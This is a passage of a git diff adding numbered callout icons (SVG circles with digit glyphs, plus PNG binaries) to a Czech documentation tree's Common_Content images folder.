-0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/37.png b/tmp/cs-CZ/xml/Common_Content/images/37.png
new file mode 100644
index 000000000..9fd99d220
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/37.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/37.svg b/tmp/cs-CZ/xml/Common_Content/images/37.svg
new file mode 100644
index 000000000..771fa4d11
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/37.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/38.png b/tmp/cs-CZ/xml/Common_Content/images/38.png
new file mode 100644
index 000000000..3ce6027f0
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/38.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/38.svg b/tmp/cs-CZ/xml/Common_Content/images/38.svg
new file mode 100644
index 000000000..487e0ef30
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/38.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/39.png b/tmp/cs-CZ/xml/Common_Content/images/39.png
new file mode 100644
index 000000000..d6894500c
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/39.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/39.svg b/tmp/cs-CZ/xml/Common_Content/images/39.svg
new file mode 100644
index 000000000..cea69f715
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/39.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/4.png b/tmp/cs-CZ/xml/Common_Content/images/4.png
new file mode 100644
index 000000000..f6c113563
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/4.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/4.svg b/tmp/cs-CZ/xml/Common_Content/images/4.svg
new file mode 100644
index 000000000..3b537d4a1
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/4.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 20.078077,19.493301 -1.460937,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460937,0 0,1.992187 m -3.959472,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09962,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.12175,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.025391,3.071289 2.75586,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/40.png b/tmp/cs-CZ/xml/Common_Content/images/40.png
new file mode 100644
index 000000000..0d3532e0f
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/40.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/40.svg b/tmp/cs-CZ/xml/Common_Content/images/40.svg
new file mode 100644
index 000000000..bb4e1d7b8
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/40.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.440535,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.0136719,0 0,-1.784668 5.1547849,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262863,0.520191 -0.42334,0.780274 l -2.0253904,3.071289 2.7558594,0"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/5.png b/tmp/cs-CZ/xml/Common_Content/images/5.png
new file mode 100644
index 000000000..4ced5472d
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/5.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/5.svg b/tmp/cs-CZ/xml/Common_Content/images/5.svg
new file mode 100644
index 000000000..ec2715dea
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/5.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
